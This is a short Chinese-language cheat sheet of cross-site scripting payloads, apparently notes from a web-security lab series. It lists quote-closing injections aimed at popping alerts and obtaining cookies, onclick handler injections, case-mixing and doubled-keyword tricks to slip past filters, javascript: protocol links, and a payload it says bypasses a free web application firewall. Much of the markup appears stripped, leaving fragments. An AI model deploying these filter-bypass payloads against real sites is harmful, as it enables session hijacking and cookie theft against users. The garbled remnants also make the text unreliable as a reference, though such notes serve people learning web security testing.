弹窗获取cookie “>
# 闭合语句弹窗获得cookie 'onclick='alert(1) onclisk事件弹窗 "onclick="alert(1)" 看源码熟悉规则,符号限制 " Onclick="alert(1) 大小写转换 " oonnclick="alert(1) 绕过一次性的过滤 ”>
 / 超链接形式 ">
 ok 能绕过免费版本的安全狗 ">
  大小写 ">
 
  alert(1)
  双重书写 javascript:alert(1) 源码转义绕过 1
  
  
  大小写 
 
  ipt>alert(1)
 ipt> 
 标签过滤 
 
Clickme 
 Clickme 如果没有数据被过滤,插入javascript协议看看 
  
 
  &t_sort="type="text"onclick="alert(1) 显示隐藏文本框,看源码,输入源码验证